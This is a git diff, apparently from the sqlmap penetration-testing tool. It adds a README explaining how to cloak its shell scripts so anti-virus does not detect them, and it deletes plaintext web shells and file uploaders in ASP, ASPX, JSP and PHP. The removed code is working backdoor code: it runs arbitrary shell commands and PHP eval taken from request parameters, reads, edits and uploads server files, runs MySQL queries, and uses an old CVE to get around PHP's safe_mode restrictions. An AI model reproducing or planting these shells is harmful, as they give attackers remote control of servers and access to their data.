diff --git a/shell/README.txt b/shell/README.txt new file mode 100644 index 000000000..0bbf1690d --- /dev/null +++ b/shell/README.txt @@ -0,0 +1,10 @@ +Due to the anti-virus positive detection of shell scripts stored inside this folder, +we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing +has to be done prior to their usage by sqlmap, but if you want to have access to their +original source code use the decrypt functionality of the ../extra/cloak/cloak.py utility. + +To prepare the original scripts to the cloacked form use this command: +find backdoor.* uploader.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; + +To get back them into the original form use this: +find backdoor.*_ uploader.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; \ No newline at end of file diff --git a/shell/backdoor.asp b/shell/backdoor.asp deleted file mode 100644 index c2278aaea..000000000 --- a/shell/backdoor.asp +++ /dev/null @@ -1,44 +0,0 @@ - - -<% -Set oScript = Server.CreateObject("WSCRIPT.SHELL") -Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") -Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") - -szCMD = request("cmd") - -If (szCMD <> "") Then - szTempFile = "C:\" & oFileSys.GetTempName() - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) - Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0) - End If -%> - - - -
- - -
-
-<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
-

-<%
-  If (IsObject(oFile)) Then
-    On Error Resume Next
-    Response.Write Server.HTMLEncode(oFile.ReadAll)
-    oFile.Close
-    Call oFileSys.DeleteFile(szTempFile, True)
-  End If
-%>
-
-
diff --git a/shell/backdoor.aspx b/shell/backdoor.aspx
deleted file mode 100644
index b420c875a..000000000
--- a/shell/backdoor.aspx
+++ /dev/null
@@ -1,42 +0,0 @@
-<%@ Page Language="C#" Debug="true" Trace="false" %>
-<%@ Import Namespace="System.Diagnostics" %>
-<%@ Import Namespace="System.IO" %>
-
-
-
-awen asp.net webshell
-
-
-

-
-
-Command:
-

-
-
-
-
-
diff --git a/shell/backdoor.jsp b/shell/backdoor.jsp
deleted file mode 100644
index daf430927..000000000
--- a/shell/backdoor.jsp
+++ /dev/null
@@ -1,47 +0,0 @@
-<%@ page import="java.io.*" %>
-<%
-      
-Process p;
-String s, cmd, html;
-
-cmd = request.getParameter("cmd");
-if (cmd == null) {
-    cmd = "pwd";
-}
-
-String []bashcmd = {"/bin/sh","-c",cmd}; 
-
-html = request.getParameter("html");
-
-if (html != null) {
-    out.println("");
-}
-
-p = Runtime.getRuntime().exec(bashcmd);
-
-BufferedReader stdInput = new BufferedReader(new 
-					     InputStreamReader(p.getInputStream()));
-
-BufferedReader stdError = new BufferedReader(new 
-					     InputStreamReader(p.getErrorStream()));
-
-
-
-while ((s = stdInput.readLine()) != null) {
-    out.println(s); 
-    if (html != null) {
-	out.println("
");
-    }
-}
-
-
-while ((s = stdError.readLine()) != null) {
-    System.out.println(s);
-    if (html != null) {
-	out.println("
");
-    }
-
-}
-
-
-%>
\ No newline at end of file
diff --git a/shell/backdoor.php b/shell/backdoor.php
deleted file mode 100644
index c26589e1d..000000000
--- a/shell/backdoor.php
+++ /dev/null
@@ -1,302 +0,0 @@
-Error: " . $message . ".";
-    die($completeMessage);
-}
-
-function getSymbolByQuantity($bytes) {
-    $symbols=array('B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB');
-    $exp=@floor(log($bytes)/log(1024));
-
-    return @sprintf('%.2f ' . $symbols[$exp], ($bytes/pow(1024, @floor($exp))));
-}
-
-function ex($command) {
-    $res='';
-    if (@function_exists('exec')) {
-        @exec($command, $res);
-        $res=@join("\n", $res);
-    }
-    elseif (@function_exists('shell_exec')) {
-        $res=@shell_exec($command);
-    }
-    elseif(@function_exists('system')) {
-        @ob_start();
-        @system($command);
-        $res=@ob_get_contents();
-        @ob_end_clean();
-    }
-    elseif (@function_exists('passthru')) {
-        @ob_start();
-        @passthru($command);
-        $res=@ob_get_contents();
-        @ob_end_clean();
-    }
-    elseif (@is_resource($f=@popen($command, "r"))) {
-        $res="";
-        while(!@feof($f)) {
-            $res .= @fread($f, 1024);
-        }
-        @pclose($f);
-    }
-    $res=@htmlspecialchars($res);
-    return $res;
-}
-
-if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) {
-    echo "";
-    echo "";
-    echo "";
-    echo "";
-    echo "";
-    echo "sqlmap PHP backdoor";
-    echo "
sqlmap PHP backdoor

";
-    echo "
System information: here
";
-    echo "PHP info: here
";
-    echo "Send an email: here
";
-    echo "
Read a file

";
-    echo "
Edit a file

";
-    echo "
Download a file
Directory: 
File: 

";
-    echo "
Upload a file

to directory: 

";
-    echo "
Browse a directory

";
-    echo "
Execute a shell command

";
-    echo "
Execute a PHP command

";
-    echo "
Execute a MySQL query
host: 
user: 
password: 
query: 

";
-    echo "
";
-}
-
-if (isset($_REQUEST["sysinfo"])) {
-    if (@strtolower(@substr(@PHP_OS, 0, 3)) == "win") {
-        $win=1;
-    }
-    else {
-        $win=0;
-    }
-    $safeMode=@ini_get("safe_mode");
-    $openBaseDir=@ini_get("open_basedir");
-    if ($safeMode || $openBaseDir) {
-	    /**
-	    *	Exploit	CVE: CVE-2006-4625
-	    *	Affected Software: PHP 5.1.6 / 4.4.4 < = x
-	    *	Advisory URL: http://securityreason.com/achievement_securityalert/42
-	    *	Try to restore to default value 
-	    */
-	    ini_restore("safe_mode");
-	    ini_restore("open_basedir");
-    }
-    $magicQuotesGpc=@ini_get("magic_quotes_gpc");
-    $dir=@getcwd();
-    $total=@disk_total_space($dir);
-    $free=@disk_free_space($dir);
-    echo "Operating system
" . @PHP_OS;
-    echo "
Server uname
" . php_uname();
-    echo "
Server uptime
";
-    echo  (!$win) ? ex("uptime") : ex("net statistics server");
-    echo "
Server time
";
-    echo date("D, M d, h:iA");
-    echo "
Disk space
";
-    echo "Total space: " . getSymbolByQuantity($total) . "
";
-    echo "Free space: " . getSymbolByQuantity($free);
-    echo "
Web server username
";
-    echo (!$win) ? `id` . "
" : @get_current_user();
-    echo "
PHP version
" . @phpversion();
-    echo "
PHP safe_mode
";
-    echo ($safeMode) ? "ON
" : "OFF
";
-    echo "
PHP open_basedir
";
-    echo ($openBaseDir) ? "ON
" : "OFF
";
-    echo "
PHP magic_quotes_gpc
";
-    echo ($magicQuotesGpc) ? "ON
" : "OFF
";
-    echo "
CPU information
";
-    echo ex("cat /proc/cpuinfo");
-    echo "
Memory information
";
-    echo ex("cat /proc/meminfo");
-    echo "
Open ports and active connections
";
-    echo (!$win) ? ex("netstat -nat") : ex("netstat -ano");
-    echo "
Network devices
"; 
-    echo (!$win) ? ex("/sbin/ifconfig -a") : ex("ipconfig /all");
-    echo "
Processes
";
-    echo (!$win) ? ex("ps auxfww") : ex("tasklist");
-    echo "
";
-	echo ($win) ? "Network use
".ex("net use")."
Network share
".ex("net share")."
Network user
".ex("net user")."
" : "";
-}
-
-else if(isset($_REQUEST["phpinfo"])) {
-    echo @phpinfo();
-}
-
-else if (isset($_REQUEST["readFile"])) {
-    $file=$_REQUEST["readFile"];
-    $fileHandler=@fopen($file, "rb") or error("Unable to read file " . $file . "");
-    $fileContent=@file_get_contents($file);
-    echo "
File: " . $file . "
";
-    echo "
" . @htmlspecialchars($fileContent) . "
";
-}
-
-else if(isset($_REQUEST["editFile"])) {
-    $file=$_REQUEST["editFile"];
-    if (!$file) {
-        error("Specify the file to edit");
-    }
-    $fileHandler=@fopen($file, "rb") or error("Unable to read file " . $file . "");
-    $fileContent=@file_get_contents($file);
-    echo "
";
-    echo "File: 

";
-    echo "
";
-}
-
-else if (isset($_REQUEST["saveFile"])) {
-    $file=$_REQUEST["saveFile"];
-    $newContent=$_REQUEST["contentFile"];
-    if (@is_writable($file)) {
-        $fileHandler=@fopen($file, "w+") or error("Unable to read file " . $file . "");
-        @fwrite($fileHandler, $newContent) or error("Unable to write on file " . $file . "");
-        echo "File " . $file . " successfully written";
-        @fclose($fileHandler);
-    }
-    else {
-        error("File " . $file . " is not writable");
-    }
-}
-
-else if (isset($_REQUEST["download"])) {
-    ob_clean();
-    $dir=$_REQUEST["dir"];
-    $file=$_REQUEST["download"];
-    $filename=$dir. "/" . $file;
-    $fileHandler=@fopen($filename, "rb") or error("Unable to read file " . $file . "");
-    $fileContent=@file_get_contents($filename);
-    header("Content-type: application/octet-stream");
-    header("Content-length: " . strlen($fileContent));
-    header("Content-disposition: attachment; filename=" . $file . ";");
-    echo $fileContent;
-    exit;
-}
-
-else if (isset($_REQUEST["upload"])) {
-    if (!isset($_REQUEST["uploadDir"])) {
-        error("Specify directory name (ig: /tmp)");
-    }
-    $dir=$_REQUEST["uploadDir"];
-    $file=$HTTP_POST_FILES["file"]["name"];
-    @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or error("File upload error");
-    @chmod($dir . "/" . $file, 0755) or error("Unable to set file permission on " . $file . "");
-    echo "
File " . $file . " successfully uploaded to " . $dir . "
";
-}
-
-else if (isset($_REQUEST["listDir"])) {
-    $dirToOpen=$_REQUEST["listDir"];
-    $dirHandler=@opendir($dirToOpen) or error("Unable to open directory");
-    echo "
Directory: " . $dirToOpen . "
";
-    echo "";
-    $list=array();
-    while ($o=@readdir($dirHandler)) {
-        $list[]=$o;
-    }
-    @closedir($dirHandler);
-    @sort($list);
-    foreach ($list as $file) {
-        if ($file == ".") {
-            continue;
-        }
-        $linkToFile=$dirToOpen . "/" . $file;
-        $isdir=@is_dir($linkToFile);
-        $islink=@is_link($linkToFile);
-        $isfile=@is_file($linkToFile);
-        echo "";
-        if ($isdir) {
-            echo "";
-        echo "";
-        $owner=@posix_getpwuid(@fileowner($linkToFile));
-        $group=@posix_getgrgid(@filegroup($linkToFile));
-        echo "";
-        if ($isdir) {
-            echo "";
-        }
-        else if ($islink) {
-            echo "";
-        }
-        else if ($isfile) {
-            echo "";
-        }
-        else {
-            echo "";
-        }
-        echo (@is_readable($linkToFile) && $isfile) ? "" : "";
-        echo (@is_writable($linkToFile) && $isfile) ? "" : "";
-        echo (@is_readable($linkToFile) && $isfile) ? "" : "";
-        echo "";
-    }
-}
-
-else if (isset($_REQUEST["mailForm"])) {
-    echo "";
-    echo "";
-    echo "To: 

";
-    echo "Subject: 

";
-    echo "Body:

";
-    echo "";
-}
-
-else if (isset($_REQUEST["mail"])) {
-    $status=@mail($_REQUEST["to"], $_REQUEST["subject"], $_REQUEST["msg"]);
-    echo $status ? "Mail sent" : "Failed to send mail";
-    @exit;
-}
-
-else if (isset($_REQUEST["cmd"])) {
-    $cmd=$_REQUEST["cmd"];
-    echo "
Shell command: " . $cmd . "
";
-    echo "
" . ex($cmd) . "
";
-}
-
-else if(isset($_REQUEST["phpcode"])) {
-    $code=$_REQUEST["phpcode"];
-    echo "
PHP command: " . $code . "
";
-    echo "
";
-    echo @eval("print_r($code);");
-    echo "
";
-}
-
-else if (isset($_REQUEST["query"])) {
-    $host=$_REQUEST["host"];
-    $user=$_REQUEST["user"];
-    $password=$_REQUEST["password"];
-    $query=$_REQUEST["query"];
-    $link=@mysql_connect("$host", "$user", "$password");
-    if (!$link) {
-        error(@mysql_error());
-    }
-    $result=@mysql_query($query);
-    if (!$result) {
-        error(@mysql_error());
-    }
-    echo "
MySQL query: " . $query . "
";
-    echo "
";
-    while ($row=@mysql_fetch_array($result, MYSQL_ASSOC)) {
-        @print_r($row);
-    }
-    echo "
";
-    @mysql_free_result($result);
-}
-
-if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) {
-    echo "";
-}
-?>
diff --git a/shell/uploader.asp b/shell/uploader.asp
deleted file mode 100644
index 2a45ccc5a..000000000
--- a/shell/uploader.asp
+++ /dev/null
@@ -1,2 +0,0 @@
-
sqlmap backdoor uploader

-<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>
diff --git a/shell/uploader.aspx b/shell/uploader.aspx
deleted file mode 100644
index e424229ab..000000000
--- a/shell/uploader.aspx
+++ /dev/null
@@ -1,23 +0,0 @@
-<%@ Page Language="vb" AutoEventWireup="false" Codebehind="uploader.aspx.vb" Inherits="VBNetUpload.WebForm1"%>
-
-
-  
-    WebForm1
-    
-    
-    
-    
-  
-  
-
-    
-
-
-

-
-
-
-    
-
-  
-
diff --git a/shell/uploader.aspx.vb b/shell/uploader.aspx.vb
deleted file mode 100644
index b7a249df4..000000000
--- a/shell/uploader.aspx.vb
+++ /dev/null
@@ -1,41 +0,0 @@
-Public Class WebForm1
-    Inherits System.Web.UI.Page
-    Protected WithEvents File1 As System.Web.UI.HtmlControls.HtmlInputFile
-    Protected WithEvents Submit1 As System.Web.UI.HtmlControls.HtmlInputButton
-
-#Region " Web Form Designer Generated Code "
-
-    'This call is required by the Web Form Designer.
-     Private Sub InitializeComponent()
-
-    End Sub
-
-    Private Sub Page_Init(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Init
-        'CODEGEN: This method call is required by the Web Form Designer
-        'Do not modify it using the code editor.
-        InitializeComponent()
-    End Sub
-
-#End Region
-
-    Private Sub Page_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
-        'Put user code to initialize the page here
-    End Sub
-
-    Private Sub Submit1_ServerClick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Submit1.ServerClick
-
-        If Not File1.PostedFile Is Nothing And File1.PostedFile.ContentLength > 0 Then
-            Dim fn As String = System.IO.Path.GetFileName(File1.PostedFile.FileName)
-            Dim SaveLocation as String = Server.MapPath("Data") & "\" & fn
-            Try
-                File1.PostedFile.SaveAs(SaveLocation)
-                Response.Write("The file has been uploaded.")
-            Catch Exc As Exception
-                Response.Write("Error: " & Exc.Message)
-            End Try
-        Else
-            Response.Write("Please select a file to upload.")
-        End If
-
-    End Sub
-End Class
diff --git a/shell/uploader.php b/shell/uploader.php
deleted file mode 100644
index 2f2efc343..000000000
--- a/shell/uploader.php
+++ /dev/null
@@ -1,12 +0,0 @@
-sqlmap backdoor uploader

to directory:  ";
-}
-?>

NamePermissionOwner/GroupSizeReadWriteDownload
";
-        }
-        else if ($isfile) {
-            echo "";
-        }
-        else {
-            echo "$linkToFile";
-        }
-        echo "$linkToFile" . @substr(@sprintf("%o", @fileperms($linkToFile)), -4) . "" . $owner["name"] . "/" . $group["name"] . "DIRLINK" . @sprintf("%u", @filesize($linkToFile)) . " bytesUnknownRead-Write-Download-